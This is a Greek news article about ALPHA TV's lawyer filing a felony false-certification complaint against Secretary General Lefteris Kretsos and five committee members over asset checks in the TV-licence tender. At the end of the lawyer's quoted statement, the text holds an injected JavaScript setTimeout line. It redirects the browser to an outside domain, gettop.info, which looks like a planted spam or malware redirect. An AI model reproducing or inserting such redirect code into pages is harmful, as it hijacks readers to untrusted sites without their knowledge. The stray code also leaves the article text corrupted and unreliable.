Μήνυση από τον Alpha κατά του Κρέτσου και μελών της Επιτροπής για τις άδειες

0
7

 

Μήνυση για το αδίκημα σε βαθμό κακουργήματος της ψευδούς βεβαίωσης κατέθεσε ο νομικός εκπρόσωπος του τηλεοπτικού σταθμού ALPHA Πάνος Λαζαράτος σε βάρος του γγ Ενημέρωσης Λευτέρη Κρέτσου και κατά των πέντε μελών της Επιτροπής που διηνήργησε ελέγχους «πόθεν έσχες» των υπερθεματιστών του διαγωνισμού για τις άδειες.

Με τη μήνυση  ζητείται η δίωξη των έξι μηνυομένων υπό τις επιβαρυντικές περιστάσεις του νόμου περί καταχραστών του Δημοσίου.

Στη μήνυση καταλογίζεται στα μέλη της Επιτροπής ότι δεν προέβησαν σε λεπτομερή έλεγχο του «πόθεν έσχες» που προσκόμισε ο κ. Καλογρίτσας προχωρώντας στην σύνταξη σχετικού πρακτικού, ενώ στον κ. Κρέτσο ότι υπέγραψε το εν λόγω πρακτικό.

Ο κ. Πάνος Λαζαράτος ανέφερε μετά την υποβολή της μήνυσης: «Οι εισαγγελικές αρχές δεν παρενέβησαν μέχρι σήμερα, όπως γνωρίζετε, στο ζήτημα του εκκρεμούς διαγωνισμού των τηλεοπτικών αδειών. Οι εισαγγελικές αρχές έπρεπε να έχουν παρέμβει. Για το λόγο αυτό ο ALPHA κατέθεσε μήνυση για κακουργηματική ψευδή βεβαίωση σε βάρος των 5 μελών της επιτροπής πόθεν έσχες και κατά του Γενικού Γραμματέα Ενημέρωσης κ. Κρέτσου, που ενέκρινε αυτό το πρακτικό. Πρόκειται για μία μήνυση για κακουργηματική ψευδή βεβαίωση με τις επιβαρυντικές περιστάσεις των καταχραστών του Δημοσίου. Ελπίζουμε ότι η επιτροπή ενστάσεων, τις προσεχείς ημέρες θα κάνει το καθήκον της». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here